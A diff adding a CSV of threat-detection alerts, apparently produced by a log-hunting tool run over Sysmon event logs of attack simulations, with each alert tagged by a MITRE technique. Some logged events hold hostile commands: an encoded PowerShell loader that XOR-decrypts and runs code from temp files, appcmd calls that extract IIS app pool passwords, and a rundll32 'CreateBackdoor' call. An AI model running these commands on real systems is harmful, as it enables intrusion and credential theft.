+
+
+
+
+
+ 2019-05-27 01:29:17.420
+ 365ABB72-3D6D-5CEB-0000-0010576BFF00
+ 2928
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 244341
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 12:36:03.899
+ 747F3D96-0A33-5E76-0000-0010B8813D00
+ 3696
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-069C-5E76-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-08DA-5E76-0000-001054382E00
+ 2632
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-26 04:01:43.557
+ 365ABB72-0FA7-5CEA-0000-001064C60A00
+ 3908
+ C:\Windows\System32\svchost.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\svchost.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8DBD-5CEA-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE
+ 365ABB72-0FA6-5CEA-0000-0010FEC30A00
+ 3884
+ C:\Users\IEUser\Desktop\info.rar\jjs.exe
+ "C:\Users\IEUser\Desktop\info.rar\jjs.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-26 04:01:43.557
+ 365ABB72-0FA7-5CEA-0000-001064C60A00
+ 3908
+ C:\Windows\System32\svchost.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\svchost.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8DBD-5CEA-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE
+ 365ABB72-0FA6-5CEA-0000-0010FEC30A00
+ 3884
+ C:\Users\IEUser\Desktop\info.rar\jjs.exe
+ "C:\Users\IEUser\Desktop\info.rar\jjs.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 26
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.418
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\samlib.dll
+ 6.1.7601.23677 (win7sp1_ldr.170209-0600)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 26
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.418
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\samlib.dll
+ 6.1.7601.23677 (win7sp1_ldr.170209-0600)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243550
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.388
+ 747F3D96-9F69-5E75-0000-001055912000
+ 8160
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5889
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.310
+ 365ABB72-3D6D-5CEB-0000-00109767FF00
+ 3096
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243550
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.388
+ 747F3D96-9F69-5E75-0000-001055912000
+ 8160
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 244866
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 21:45:04.909
+ 747F3D96-8AE0-5E76-0000-0010933B8003
+ 7708
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\windows\system32\cmd.exe"
+ c:\Users\Public\
+ MSEDGEWIN10\IEUser
+ 747F3D96-06A4-5E76-0000-002087DE0200
+ 0x2de87
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-06AA-5E76-0000-001046E10400
+ 4668
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 17289
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-13 18:03:20.485
+ 365ABB72-B167-5CD9-0000-001062160C00
+ 2476
+ C:\Windows\System32\regsvr32.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7
+ 49159
+
+ false
+ 151.101.128.133
+
+ 443
+ https
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243550
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.388
+ 747F3D96-9F69-5E75-0000-001055912000
+ 8160
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 25
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.138
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\cryptdll.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Cryptography Manager
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 25
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.138
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\cryptdll.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Cryptography Manager
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5886
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.230
+ 365ABB72-3D6D-5CEB-0000-0010D763FF00
+ 3240
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
